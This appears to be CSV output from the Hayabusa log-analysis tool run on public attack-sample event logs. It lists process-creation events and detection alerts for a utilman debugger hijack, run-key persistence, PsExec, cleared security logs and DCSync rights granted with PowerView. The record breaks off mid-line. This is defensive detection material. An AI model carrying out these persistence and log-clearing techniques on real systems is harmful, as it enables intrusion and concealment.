+09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:50.497 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:53.111 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,System log file was cleared,User: user01,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx -2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx -2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx -2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend 